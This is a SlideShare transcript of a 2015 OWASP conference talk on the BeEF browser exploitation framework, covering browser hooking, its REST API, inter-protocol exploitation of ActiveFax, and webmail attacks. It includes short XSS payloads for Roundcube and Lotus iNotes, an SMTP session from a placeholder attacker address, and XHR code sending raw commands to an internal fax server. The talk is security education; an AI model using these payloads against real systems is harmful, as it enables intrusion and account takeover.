SlideShare a Scribd company logo

Owasp AppSecEU 2015 - BeEF Session

B
Bart Leppens

Slides from the BeEF session at AppSecEU (Amsterdam may 22 2015).

Software
1 of 71
Download to read offline
OWASP AppSecEU 2015 Bart Leppens
whoami Bart Leppens ● BeEF developer (since may 2012) ● Ported BeEF Bind shellcode to Linux ● Smashing the stack for FUN @bmantra In
Disclaimer ● The views and opinions expressed here are my own and do not necessarily represent those of my employer ● My employer has absolutely nothing to do with anything related to BeEF ● I’m not speaking in the representation of my company
What the talk? ● BeEF: Browser Exploitation Framework ○ architecture ○ modules ○ extensions ● … live demos and videos
BeEF: Browser Exploitation Framework ● Professional security tool ● Focus on client side attack vectors ● Real attack scenarios ● v1.0 by Wade Alcorn http://beefproject.comhttps://github.com/beefproject/beef
BeEF: Live CD ● https://github. com/beefproject/beef/wiki/BeEF- Live-CD ● Ubuntu 12.04 LTS ● Ruby 1.9.3p194 ● Metasploit and sqlmap
BeEF: Architecture
BeEF: Hook a Browser Inject the javascript hook to the DOM ● Cross-site Scripting ● MiTM ● Controlling DNS ● Social Engineering ● … be creative ;)
BeEF: Polling ● Once the browser is hooked, the browser will ‘poll’ BeEF for new JavaScript payloads to execute ● When a payload is found, the browser will execute it
BeEF: A Whole Lot Of Modules ● Many different purposes ○ Information gathering ○ Social Engineering ○ Network Discovery ○ ... ● Easy to extend with your own modules ● Complex scenarios with RestFul API http://beefproject.comhttps://github.com/beefproject/beef
BeEF: Module overview Each module contains 3 primary files: ● config.yaml => Configuration file ● module.rb => Ruby Module Code ● command.js =>JavaScript payload http://beefproject.comhttps://github.com/beefproject/beef
BeEF: config.yaml Provides basic information ● name of author ● category ● working browsers ● determines if module is enabled http://beefproject.comhttps://github.com/beefproject/beef
BeEF: module.rb Defines configurable options (self.options) Defines return result actions (post.execute) http://beefproject.comhttps://github.com/beefproject/beef
BeEF: command.js JavaScript payload template ● Supports eRuby variable substitution <%= @var %> ● Access to the JavaScript BeEF object beef.net.forge_request
BeEF: Sesame Magic Browser “Internal server vulnerabilities are sitting there bored and lonely” - Michele Orru` // ”ActiveFax, you look very bored” - Bart Leppens
BeEF: DEMO
BeEF: Skype iOS URI Scheme
BeEF: IoT
BeEF: GlassFish XSRF ● REST CSRF in GlassFish 3.1.1 (build 12) ● Bug FOUND by Roberto Suggi Liverani ● According to ORACLE the 3th most critical bug ever in SUN products ● Demo (fingerprint + exploit)
BeEF: CookieJar overflow ● JavaScript cannot modify HTTPOnly-cookies ● John Wilander overflowed the CookieJar ● Recreate those cookies ● Demo
BeEF: Autorun ● launch modules automatically on new hooked browsers ● edit config.yaml set autorun: true in each module ● limitation => used with default parameters
BeEF: RESTful API Scripting BeEF through HTTP/JSON requests ● token parameter must be always added to requests ● GET or POST ● Automate advanced attacks automatically
BeEF: RESTful API Authentication ● Post credentials to /api/admin/login ● return authentication token ● e.g. curl -H "Content-Type: application/json" -X POST -d '{"username":"beef", "password":"beef"}' http://127.0.0.1:3000/api/admin/login
BeEF: RESTful API Hooked Browsers ● GET to /api/hooks ● return online/offline hooked browsers ● e.g. curl http://127.0.0.1: 3000/api/hooks?token=[token]
BeEF: RESTful API Browser Details ● GET to /api/hooks/:session ● Information on the hooked browser ● e.g. curl http://127.0.0.1: 3000/api/hooks/[session]?token=[token]
BeEF: RESTful API List Command Modules ● GET to /api/modules ● e.g. curl http://127.0.0.1: 3000/api/modules?token=[token]
BeEF: RESTful API Informations on a specific module ● GET to /api/modules/:module_id ● e.g. curl http://127.0.0.1: 3000/api/modules/[module_id]?token= [token]
BeEF: RESTful API Launch a command on a specific browser ● POST to /api/modules/:session/:module_id ● e.g. curl -H "Content-Type: application/json; charset=UTF-8" -d '{"question":"wtf?"}' -X POST http://127. 0.0.1:3000/api/modules/[session]/ [module]?token=[token]
BeEF: RESTful API Return information about the command module previously executed ● GET to /api/modules/:session/:mod_id/: cmd_id ● e.g. curl http://127.0.0.1: 3000/api/modules/[session]/[module_id]/ [cmd_id]?token=[token]
BeEF: RESTful API A whole lot more: ● control BeEF DNS rules ● Access Logs ● ... Refer to the BeEF Wiki: https://github. com/beefproject/beef/wiki/BeEF-RESTful-API
BeEF: Console Console is a BeEF extension ● metasploit-like console ● should be enabled in the main config. yaml ● control hooked browsers
BeEF: Metasploit integration Console is a BeEF extension ● should be enabled in the main config. yaml ● should be configured in extentions/metasploit/ ● msfrpcd can be launched automatically from within BeEF :-)
IPC: Inter-Protocol Communication ● Initial research by Wade Alcorn in 2006/2007 ● “Tolerant” protocol implementation that does not drop the client connection after N errors ● A properly encoded POST request can be send to the target: ○ HTTP Headers are parsed as BAD COMMANDS ○ HTTP request body is parsed as VALID COMMANDS (or as SHELLCODE)
IPC: Limitations ● Some ports are banned by the Browser (e.g. 21,25,110,..) ● Content-Type: text/plain or multipart/form- data ● Doesn’t work well with binary protocols => often not that tolerant
IPC: ActiveFax Server ● Extended research done in 2013 by Michele Orru` & myself ● Widely used Fax solution ● Manual suggest port 3000 for RAW socket ● Protocol is very tolerant ● Commands are formatted as: @Fxxx data@
IPC: ActiveFax Server (example message) Sender...................... Bart Leppens, +1 11 112233-25 Recipient 1............... OWASP Belgium, Fax: 016 123456 Subject..................... IPC is cool Priority...................... Very High @F101 Bart Leppens@@F110 +1 11 112233-25@ @F201 OWASP Belgium@@F211 016 123456@ @F307 IPC is cool@ @F301 1@
IPC: ActiveFax Server (XHR) var xhr = new XMLHttpRequest(); var uri = "http://x.x.x.x:3000/"; xhr.open("POST", uri, true); xhr.setRequestHeader("Content-Type", "text/plain"); var post_body = "@F101 Bart Leppens@@F110 +1 11 112233- 25@@F201 OWASP Belgium@@F211 016 123456@@F307 IPC is cool@@F301 1@"; xhr.send(post_body);
IPC: ActiveFax Server (XHR) POST / HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:24.0) Gecko/20100101 Firefox/24.0 .. Content-Type: text/plain; charset=UTF-8 Cache-Control: no-cache @F101 Bart Leppens@@F110 +1 11 112233-25@@F201 OWASP Belgium@@F211 016 123456@@F307 IPC is cool@@F301 1@
IPC: ActiveFax Server (Demo)
IPC: ActiveFax Server (Time-out) The ActiveFax RAW socket takes 60 seconds to time-out. We can fix that! 2 seconds is more then enough to send a FAX over a LAN network: xhr = new XMLHttpRequest(); .. xhr.send(post_body); setTimeout(function(){xhr.abort()}, 2000);
IPC: ActiveFax Server (Faster Demo)
BeEF: NAT Pinning ● Samy Kamkar in 2010 ● Trick user to visit page ● Access port on internal network (via IPC) ● Connection Tracking must be enabled ● not only routers, IPTables with connection tracking works as well
BeEF: NAT Pinning
IPE: Inter-Protocol Exploitation ● Research by Wade Alcorn (extension of IPC) ● Extended research in 2012 by Michele Orru` ○ QualCOMM WorldMail IMAP 3.0 ● More research in 2013 by Michele & myself ○ ActiveFax Server
IPE: Inter-Protocol Exploitation ● Need to send binary data ○ sendAsBinary (FF, Chrome) ● Same restrictions: tolerance, blocked ports ● More restrictions: header space, bad chars
IPE: ActiveFax 5.01 RAW Server Exploit ● bug found by Craig Freyman ● @F506 crashes after 1024 bytes ● Many bad characters: ○ 0x00 -> 0x19 ○ 0x40 (@) ● PoC modified to use IPE
IPE: ActiveFax (Metasploit Reverse shell)
IPE: ActiveFax (Demo)
BeEF Bind Shellcode ● Shellcode written by Ty Miller (Win32) ● Allows communication from the browser to a shell ○ Commands are proxied back and forth through the browser to cmd.exe ○ Stage is delivered through the browser as well
BeEF Bind Shellcode: The Stager ● Stager listens on a specified port for HTTP requests ● Ignores HTTP headers and looks for the egg “cmd=” which marks the start of our 2nd stage (or any stage you like) ● Allocate executable memory + copy ● Jump into the stage shellcode
BeEF Bind Shellcode: The Stage ● Stage listens on a specified port for HTTP requests as well ● Ignores HTTP headers and looks for “cmd=” which marks the start of our command ● Requests are proxied back and forth from the browser to a “cmd.exe” childprocess ● Access-Control-Allow-Origin: *
BeEF Bind Shellcode: ● Ported to Linux x86 and Linux x64 ○ stager and stage ● Can also be used compiled with RCE vulns ● Metasploit modules are available for easily encoding and removal of bad characters
IPE: ActiveFax (BeEF Bind + BeEF)
IPE: ActiveFax (Demo)
Exploiting Webmail with XSS Cross-site Scripting ● most common vulnerability ● impact = underestimated ● mail = interesting target for attacker
CVE-2011-2937 Round-cube reflected Cross-site Scripting vulnerability ● found by Abyszko ● before 0.5.4 http://server/roundcube/?_mbox=<script> alert(document.cookie)</script> CVE score for this bug is 4.3 out of 10.
CVE-2014-0913 Lotus iNotes stored Cross-site Scripting vulnerability ● IBM iNotes and Domino 8.5.3 FP6 before IF2 and 9.0.1 before FP1 ● Inject arbitrary web script or HTML via an e- mail message CVE score for this bug is 4.3 out of 10.
CVE-2014-0913 Lotus iNotes telnet iNotesSMTPserver 25 HELO xss MAIL FROM: attacker@evil.com RCPT TO: poorvictim@good.com DATA MIME-Version: 1.0 FROM: ATTACKER <attacker@evil.com> TO: VICTIM <poorvictim@good.com> Subject: iNotes XSS vulnerable mail Content-Type: text/html <img style="display:none" src="x"/onerror="alert(1)">
Universal Cross-site Scripting and webmail ● Control every origin ● Execute arbitrary code ● Control all webmail clients => including Cloud based like gmail, yahoo mail, etc.
This is a myth: there ain’t no such thing ● Targeted mailbox attack ○ read mails ○ send mails ● Nesting and replication ○ Mailworm - Nduja by Rosario Valotta in 2007 ■ spreading across multiple webmail services ■ named after spicy italian sausage from Calabria, Italy
This is a myth: there ain’t no such thing ● DDoS of server ○ BeEF DOSer-module ○ also internal servers (via victims browser) ● DDoS of mailbox ○ multiple zombies sending mails to victim
This is a myth: there ain’t no such thing ● Sending spam ○ by email account of trusted user ● Download infection ○ attachment that seems to be sent from well-know user (=victim) ○ Replace attachment links in existing mails
This is a myth: there ain’t no such thing ● Modify existing “notes” ● Social Engineering attacks by mail ● Perform reset of passwords ● names.nsf in iNotes ● ….
This is a myth: there ain’t no such thing 4.3/10
DEMO
Tunneling Proxy Reverse HTTP Proxy ● hooked browser = exit point ● XHR requests or WebSockets ● limited to the hooked domain and security context of the victims browser
Tunneling Proxy Attack scenarios ● browsing hooked domain (security context of the victim browser) ● spidering hooked domain ● finding and exploiting SQLi with Burp Pro Scanner and sqlmap ● Video
BeEF: Video Videos ● TrixBox exploit ● WebCloner Massmailer ● uiabuse ● Distributed Blind SQLi ● ..
For those who can’t get enough ● Browser Hackers Handbook ○ 50% of revenues will be used for the BeEF project (testing infrastructure, etc..)
Thanks to ● OWASP ● The other BeEF guys ;) ● My wife for lending her laptop
Questions

Recommended

Browser exploit framework
Browser exploit frameworkBrowser exploit framework
Browser exploit frameworkPrashanth Sivarajan
 
Browser Exploitation Framework Tutorial
Browser Exploitation Framework TutorialBrowser Exploitation Framework Tutorial
Browser Exploitation Framework Tutorialimlaurel2
 
Kali net hunter
Kali net hunterKali net hunter
Kali net hunterPrashanth Sivarajan
 
BeEF
BeEFBeEF
BeEFAlexandraLacatus
 
Magento and Continuous Integration - Damian Luszczymak
Magento and Continuous Integration - Damian LuszczymakMagento and Continuous Integration - Damian Luszczymak
Magento and Continuous Integration - Damian LuszczymakMeet Magento Spain
 
Continuous Integration and Deployment Patterns for Magento
Continuous Integration and Deployment Patterns for MagentoContinuous Integration and Deployment Patterns for Magento
Continuous Integration and Deployment Patterns for MagentoAOE
 
When you don't have 0days: client-side exploitation for the masses
When you don't have 0days: client-side exploitation for the massesWhen you don't have 0days: client-side exploitation for the masses
When you don't have 0days: client-side exploitation for the massesMichele Orru
 
Continuous Integration @ MeetMagento Germany 2015
Continuous Integration @ MeetMagento Germany 2015Continuous Integration @ MeetMagento Germany 2015
Continuous Integration @ MeetMagento Germany 2015Aleksey Razbakov
 

Recommended

Browser exploit framework
Browser exploit frameworkBrowser exploit framework
Browser exploit frameworkPrashanth Sivarajan
 
Browser Exploitation Framework Tutorial
Browser Exploitation Framework TutorialBrowser Exploitation Framework Tutorial
Browser Exploitation Framework Tutorialimlaurel2
 
Kali net hunter
Kali net hunterKali net hunter
Kali net hunterPrashanth Sivarajan
 
BeEF
BeEFBeEF
BeEFAlexandraLacatus
 
Magento and Continuous Integration - Damian Luszczymak
Magento and Continuous Integration - Damian LuszczymakMagento and Continuous Integration - Damian Luszczymak
Magento and Continuous Integration - Damian LuszczymakMeet Magento Spain
 
Continuous Integration and Deployment Patterns for Magento
Continuous Integration and Deployment Patterns for MagentoContinuous Integration and Deployment Patterns for Magento
Continuous Integration and Deployment Patterns for MagentoAOE
 
When you don't have 0days: client-side exploitation for the masses
When you don't have 0days: client-side exploitation for the massesWhen you don't have 0days: client-side exploitation for the masses
When you don't have 0days: client-side exploitation for the massesMichele Orru
 
Continuous Integration @ MeetMagento Germany 2015
Continuous Integration @ MeetMagento Germany 2015Continuous Integration @ MeetMagento Germany 2015
Continuous Integration @ MeetMagento Germany 2015Aleksey Razbakov
 
Magento Testing on all fronts
Magento Testing on all frontsMagento Testing on all fronts
Magento Testing on all frontsAOE
 
Defending Against Application DoS attacks
Defending Against Application DoS attacksDefending Against Application DoS attacks
Defending Against Application DoS attacksRoberto Suggi Liverani
 
Root via XSS
Root via XSSRoot via XSS
Root via XSSPositive Hack Days
 
Window Shopping Browser - Bug Hunting in 2012
Window Shopping Browser - Bug Hunting in 2012Window Shopping Browser - Bug Hunting in 2012
Window Shopping Browser - Bug Hunting in 2012Roberto Suggi Liverani
 
Advances in BeEF - AthCon2012
Advances in BeEF - AthCon2012Advances in BeEF - AthCon2012
Advances in BeEF - AthCon2012Michele Orru
 
Rock-solid Magento Deployments (and Development)
Rock-solid Magento Deployments (and Development)Rock-solid Magento Deployments (and Development)
Rock-solid Magento Deployments (and Development)AOE
 
BlueHat v17 || Mitigations for the Masses: From EMET to Windows Defender Exp...
BlueHat v17 || Mitigations for the Masses: From EMET to Windows Defender Exp...BlueHat v17 || Mitigations for the Masses: From EMET to Windows Defender Exp...
BlueHat v17 || Mitigations for the Masses: From EMET to Windows Defender Exp...BlueHat Security Conference
 
Cross Context Scripting attacks & exploitation
Cross Context Scripting attacks & exploitationCross Context Scripting attacks & exploitation
Cross Context Scripting attacks & exploitationRoberto Suggi Liverani
 
TakeDownCon Rocket City: WebShells by Adrian Crenshaw
TakeDownCon Rocket City: WebShells by Adrian CrenshawTakeDownCon Rocket City: WebShells by Adrian Crenshaw
TakeDownCon Rocket City: WebShells by Adrian CrenshawEC-Council
 
Anatomy of PHP Shells
Anatomy of PHP ShellsAnatomy of PHP Shells
Anatomy of PHP ShellsVedran Krivokuca
 
Multithreaded XML Import (San Francisco Magento Meetup)
Multithreaded XML Import (San Francisco Magento Meetup)Multithreaded XML Import (San Francisco Magento Meetup)
Multithreaded XML Import (San Francisco Magento Meetup)AOE
 
Continuous Development and Deployment: Workflows and Patterns
Continuous Development and Deployment: Workflows and PatternsContinuous Development and Deployment: Workflows and Patterns
Continuous Development and Deployment: Workflows and PatternsAOE
 
[ENG] OHM2013 - The Quest for the Client-Side Elixir Against Zombie Browsers -
[ENG] OHM2013 - The Quest for the Client-Side Elixir Against Zombie Browsers - [ENG] OHM2013 - The Quest for the Client-Side Elixir Against Zombie Browsers -
[ENG] OHM2013 - The Quest for the Client-Side Elixir Against Zombie Browsers - Zoltan Balazs
 
How Vorlon.js helps you debug your web projects
How Vorlon.js helps you debug your web projectsHow Vorlon.js helps you debug your web projects
How Vorlon.js helps you debug your web projectsEtienne Margraff
 
Flashack
FlashackFlashack
Flashackn|u - The Open Security Community
 
Playing in the SharePoint SandBox
Playing in the SharePoint SandBoxPlaying in the SharePoint SandBox
Playing in the SharePoint SandBoxToni Frankola
 
Web browsers
Web browsersWeb browsers
Web browserstorosalgado
 
I got 99 trends and a # is all of them
I got 99 trends and a # is all of themI got 99 trends and a # is all of them
I got 99 trends and a # is all of themRoberto Suggi Liverani
 
Secuirty News Bytes-Bangalore may 2014
Secuirty News Bytes-Bangalore may 2014 Secuirty News Bytes-Bangalore may 2014
Secuirty News Bytes-Bangalore may 2014 n|u - The Open Security Community
 
Android Tamer BH USA 2016 : Arsenal Presentation
Android Tamer BH USA 2016 : Arsenal PresentationAndroid Tamer BH USA 2016 : Arsenal Presentation
Android Tamer BH USA 2016 : Arsenal PresentationAnant Shrivastava
 
How to-catch-a-chameleon-steven seeley-ruxcon-2012
How to-catch-a-chameleon-steven seeley-ruxcon-2012How to-catch-a-chameleon-steven seeley-ruxcon-2012
How to-catch-a-chameleon-steven seeley-ruxcon-2012_mr_me
 
Final lfh presentation (3)
Final lfh presentation (3)Final lfh presentation (3)
Final lfh presentation (3)__x86
 

More Related Content

What's hot

Magento Testing on all fronts
Magento Testing on all frontsMagento Testing on all fronts
Magento Testing on all frontsAOE
 
Defending Against Application DoS attacks
Defending Against Application DoS attacksDefending Against Application DoS attacks
Defending Against Application DoS attacksRoberto Suggi Liverani
 
Window Shopping Browser - Bug Hunting in 2012
Window Shopping Browser - Bug Hunting in 2012Window Shopping Browser - Bug Hunting in 2012
Window Shopping Browser - Bug Hunting in 2012Roberto Suggi Liverani
 
Advances in BeEF - AthCon2012
Advances in BeEF - AthCon2012Advances in BeEF - AthCon2012
Advances in BeEF - AthCon2012Michele Orru
 
Rock-solid Magento Deployments (and Development)
Rock-solid Magento Deployments (and Development)Rock-solid Magento Deployments (and Development)
Rock-solid Magento Deployments (and Development)AOE
 
BlueHat v17 || Mitigations for the Masses: From EMET to Windows Defender Exp...
BlueHat v17 || Mitigations for the Masses: From EMET to Windows Defender Exp...BlueHat v17 || Mitigations for the Masses: From EMET to Windows Defender Exp...
BlueHat v17 || Mitigations for the Masses: From EMET to Windows Defender Exp...BlueHat Security Conference
 
Cross Context Scripting attacks & exploitation
Cross Context Scripting attacks & exploitationCross Context Scripting attacks & exploitation
Cross Context Scripting attacks & exploitationRoberto Suggi Liverani
 
TakeDownCon Rocket City: WebShells by Adrian Crenshaw
TakeDownCon Rocket City: WebShells by Adrian CrenshawTakeDownCon Rocket City: WebShells by Adrian Crenshaw
TakeDownCon Rocket City: WebShells by Adrian CrenshawEC-Council
 
Multithreaded XML Import (San Francisco Magento Meetup)
Multithreaded XML Import (San Francisco Magento Meetup)Multithreaded XML Import (San Francisco Magento Meetup)
Multithreaded XML Import (San Francisco Magento Meetup)AOE
 
Continuous Development and Deployment: Workflows and Patterns
Continuous Development and Deployment: Workflows and PatternsContinuous Development and Deployment: Workflows and Patterns
Continuous Development and Deployment: Workflows and PatternsAOE
 
[ENG] OHM2013 - The Quest for the Client-Side Elixir Against Zombie Browsers -
[ENG] OHM2013 - The Quest for the Client-Side Elixir Against Zombie Browsers - [ENG] OHM2013 - The Quest for the Client-Side Elixir Against Zombie Browsers -
[ENG] OHM2013 - The Quest for the Client-Side Elixir Against Zombie Browsers - Zoltan Balazs
 
How Vorlon.js helps you debug your web projects
How Vorlon.js helps you debug your web projectsHow Vorlon.js helps you debug your web projects
How Vorlon.js helps you debug your web projectsEtienne Margraff
 
Playing in the SharePoint SandBox
Playing in the SharePoint SandBoxPlaying in the SharePoint SandBox
Playing in the SharePoint SandBoxToni Frankola
 
I got 99 trends and a # is all of them
I got 99 trends and a # is all of themI got 99 trends and a # is all of them
I got 99 trends and a # is all of themRoberto Suggi Liverani
 
Android Tamer BH USA 2016 : Arsenal Presentation
Android Tamer BH USA 2016 : Arsenal PresentationAndroid Tamer BH USA 2016 : Arsenal Presentation
Android Tamer BH USA 2016 : Arsenal PresentationAnant Shrivastava
 

What's hot (20)

Magento Testing on all fronts
Magento Testing on all frontsMagento Testing on all fronts
Magento Testing on all fronts
 
Defending Against Application DoS attacks
Defending Against Application DoS attacksDefending Against Application DoS attacks
Defending Against Application DoS attacks
 
Root via XSS
Root via XSSRoot via XSS
Root via XSS
 
Window Shopping Browser - Bug Hunting in 2012
Window Shopping Browser - Bug Hunting in 2012Window Shopping Browser - Bug Hunting in 2012
Window Shopping Browser - Bug Hunting in 2012
 
Advances in BeEF - AthCon2012
Advances in BeEF - AthCon2012Advances in BeEF - AthCon2012
Advances in BeEF - AthCon2012
 
Rock-solid Magento Deployments (and Development)
Rock-solid Magento Deployments (and Development)Rock-solid Magento Deployments (and Development)
Rock-solid Magento Deployments (and Development)
 
BlueHat v17 || Mitigations for the Masses: From EMET to Windows Defender Exp...
BlueHat v17 || Mitigations for the Masses: From EMET to Windows Defender Exp...BlueHat v17 || Mitigations for the Masses: From EMET to Windows Defender Exp...
BlueHat v17 || Mitigations for the Masses: From EMET to Windows Defender Exp...
 
Cross Context Scripting attacks & exploitation
Cross Context Scripting attacks & exploitationCross Context Scripting attacks & exploitation
Cross Context Scripting attacks & exploitation
 
TakeDownCon Rocket City: WebShells by Adrian Crenshaw
TakeDownCon Rocket City: WebShells by Adrian CrenshawTakeDownCon Rocket City: WebShells by Adrian Crenshaw
TakeDownCon Rocket City: WebShells by Adrian Crenshaw
 
Anatomy of PHP Shells
Anatomy of PHP ShellsAnatomy of PHP Shells
Anatomy of PHP Shells
 
Multithreaded XML Import (San Francisco Magento Meetup)
Multithreaded XML Import (San Francisco Magento Meetup)Multithreaded XML Import (San Francisco Magento Meetup)
Multithreaded XML Import (San Francisco Magento Meetup)
 
Continuous Development and Deployment: Workflows and Patterns
Continuous Development and Deployment: Workflows and PatternsContinuous Development and Deployment: Workflows and Patterns
Continuous Development and Deployment: Workflows and Patterns
 
[ENG] OHM2013 - The Quest for the Client-Side Elixir Against Zombie Browsers -
[ENG] OHM2013 - The Quest for the Client-Side Elixir Against Zombie Browsers - [ENG] OHM2013 - The Quest for the Client-Side Elixir Against Zombie Browsers -
[ENG] OHM2013 - The Quest for the Client-Side Elixir Against Zombie Browsers -
 
How Vorlon.js helps you debug your web projects
How Vorlon.js helps you debug your web projectsHow Vorlon.js helps you debug your web projects
How Vorlon.js helps you debug your web projects
 
Flashack
FlashackFlashack
Flashack
 
Playing in the SharePoint SandBox
Playing in the SharePoint SandBoxPlaying in the SharePoint SandBox
Playing in the SharePoint SandBox
 
Web browsers
Web browsersWeb browsers
Web browsers
 
I got 99 trends and a # is all of them
I got 99 trends and a # is all of themI got 99 trends and a # is all of them
I got 99 trends and a # is all of them
 
Secuirty News Bytes-Bangalore may 2014
Secuirty News Bytes-Bangalore may 2014 Secuirty News Bytes-Bangalore may 2014
Secuirty News Bytes-Bangalore may 2014
 
Android Tamer BH USA 2016 : Arsenal Presentation
Android Tamer BH USA 2016 : Arsenal PresentationAndroid Tamer BH USA 2016 : Arsenal Presentation
Android Tamer BH USA 2016 : Arsenal Presentation
 

Viewers also liked

How to-catch-a-chameleon-steven seeley-ruxcon-2012
How to-catch-a-chameleon-steven seeley-ruxcon-2012How to-catch-a-chameleon-steven seeley-ruxcon-2012
How to-catch-a-chameleon-steven seeley-ruxcon-2012_mr_me
 
Final lfh presentation (3)
Final lfh presentation (3)Final lfh presentation (3)
Final lfh presentation (3)__x86
 
D2 t2 steven seeley - ghost in the windows 7 allocator
D2 t2 steven seeley - ghost in the windows 7 allocatorD2 t2 steven seeley - ghost in the windows 7 allocator
D2 t2 steven seeley - ghost in the windows 7 allocator_mr_me
 
[Blackhat2015] FileCry attack against Java
[Blackhat2015] FileCry attack against Java[Blackhat2015] FileCry attack against Java
[Blackhat2015] FileCry attack against JavaMoabi.com
 
How Safe is your Link ?
How Safe is your Link ?How Safe is your Link ?
How Safe is your Link ?Peter Hlavaty
 
The Hidden XSS - Attacking the Desktop & Mobile Platforms
The Hidden XSS - Attacking the Desktop & Mobile PlatformsThe Hidden XSS - Attacking the Desktop & Mobile Platforms
The Hidden XSS - Attacking the Desktop & Mobile Platformskosborn
 
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015CODE BLUE
 
주로사용되는 Xss필터와 이를 공격하는 방법
주로사용되는 Xss필터와 이를 공격하는 방법주로사용되는 Xss필터와 이를 공격하는 방법
주로사용되는 Xss필터와 이를 공격하는 방법guestad13b55
 
New Methods in Automated XSS Detection & Dynamic Exploit Creation
New Methods in Automated XSS Detection & Dynamic Exploit CreationNew Methods in Automated XSS Detection & Dynamic Exploit Creation
New Methods in Automated XSS Detection & Dynamic Exploit CreationKen Belva
 
SSRF vs. Business-critical applications. XXE tunneling in SAP
SSRF vs. Business-critical applications. XXE tunneling in SAPSSRF vs. Business-critical applications. XXE tunneling in SAP
SSRF vs. Business-critical applications. XXE tunneling in SAPERPScan
 
XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?Yurii Bilyk
 
Known XML Vulnerabilities Are Still a Threat to Popular Parsers ! & Open Sour...
Known XML Vulnerabilities Are Still a Threat to Popular Parsers ! & Open Sour...Known XML Vulnerabilities Are Still a Threat to Popular Parsers ! & Open Sour...
Known XML Vulnerabilities Are Still a Threat to Popular Parsers ! & Open Sour...Lionel Briand
 
libinjection: from SQLi to XSS  by Nick Galbreath
libinjection: from SQLi to XSS  by Nick Galbreathlibinjection: from SQLi to XSS  by Nick Galbreath
libinjection: from SQLi to XSS  by Nick GalbreathCODE BLUE
 
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...CODE BLUE
 
ORM2Pwn: Exploiting injections in Hibernate ORM
ORM2Pwn: Exploiting injections in Hibernate ORMORM2Pwn: Exploiting injections in Hibernate ORM
ORM2Pwn: Exploiting injections in Hibernate ORMMikhail Egorov
 
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...Mario Heiderich
 
Windows Kernel Exploitation : This Time Font hunt you down in 4 bytes
Windows Kernel Exploitation : This Time Font hunt you down in 4 bytesWindows Kernel Exploitation : This Time Font hunt you down in 4 bytes
Windows Kernel Exploitation : This Time Font hunt you down in 4 bytesPeter Hlavaty
 

Viewers also liked (20)

How to-catch-a-chameleon-steven seeley-ruxcon-2012
How to-catch-a-chameleon-steven seeley-ruxcon-2012How to-catch-a-chameleon-steven seeley-ruxcon-2012
How to-catch-a-chameleon-steven seeley-ruxcon-2012
 
Final lfh presentation (3)
Final lfh presentation (3)Final lfh presentation (3)
Final lfh presentation (3)
 
D2 t2 steven seeley - ghost in the windows 7 allocator
D2 t2 steven seeley - ghost in the windows 7 allocatorD2 t2 steven seeley - ghost in the windows 7 allocator
D2 t2 steven seeley - ghost in the windows 7 allocator
 
[Blackhat2015] FileCry attack against Java
[Blackhat2015] FileCry attack against Java[Blackhat2015] FileCry attack against Java
[Blackhat2015] FileCry attack against Java
 
How Safe is your Link ?
How Safe is your Link ?How Safe is your Link ?
How Safe is your Link ?
 
The Hidden XSS - Attacking the Desktop & Mobile Platforms
The Hidden XSS - Attacking the Desktop & Mobile PlatformsThe Hidden XSS - Attacking the Desktop & Mobile Platforms
The Hidden XSS - Attacking the Desktop & Mobile Platforms
 
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
 
Building Advanced XSS Vectors
Building Advanced XSS VectorsBuilding Advanced XSS Vectors
Building Advanced XSS Vectors
 
주로사용되는 Xss필터와 이를 공격하는 방법
주로사용되는 Xss필터와 이를 공격하는 방법주로사용되는 Xss필터와 이를 공격하는 방법
주로사용되는 Xss필터와 이를 공격하는 방법
 
New Methods in Automated XSS Detection & Dynamic Exploit Creation
New Methods in Automated XSS Detection & Dynamic Exploit CreationNew Methods in Automated XSS Detection & Dynamic Exploit Creation
New Methods in Automated XSS Detection & Dynamic Exploit Creation
 
SSRF vs. Business-critical applications. XXE tunneling in SAP
SSRF vs. Business-critical applications. XXE tunneling in SAPSSRF vs. Business-critical applications. XXE tunneling in SAP
SSRF vs. Business-critical applications. XXE tunneling in SAP
 
XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?
 
Known XML Vulnerabilities Are Still a Threat to Popular Parsers ! & Open Sour...
Known XML Vulnerabilities Are Still a Threat to Popular Parsers ! & Open Sour...Known XML Vulnerabilities Are Still a Threat to Popular Parsers ! & Open Sour...
Known XML Vulnerabilities Are Still a Threat to Popular Parsers ! & Open Sour...
 
libinjection: from SQLi to XSS  by Nick Galbreath
libinjection: from SQLi to XSS  by Nick Galbreathlibinjection: from SQLi to XSS  by Nick Galbreath
libinjection: from SQLi to XSS  by Nick Galbreath
 
SSRF workshop
SSRF workshop SSRF workshop
SSRF workshop
 
How To Detect Xss
How To Detect XssHow To Detect Xss
How To Detect Xss
 
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
 
ORM2Pwn: Exploiting injections in Hibernate ORM
ORM2Pwn: Exploiting injections in Hibernate ORMORM2Pwn: Exploiting injections in Hibernate ORM
ORM2Pwn: Exploiting injections in Hibernate ORM
 
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
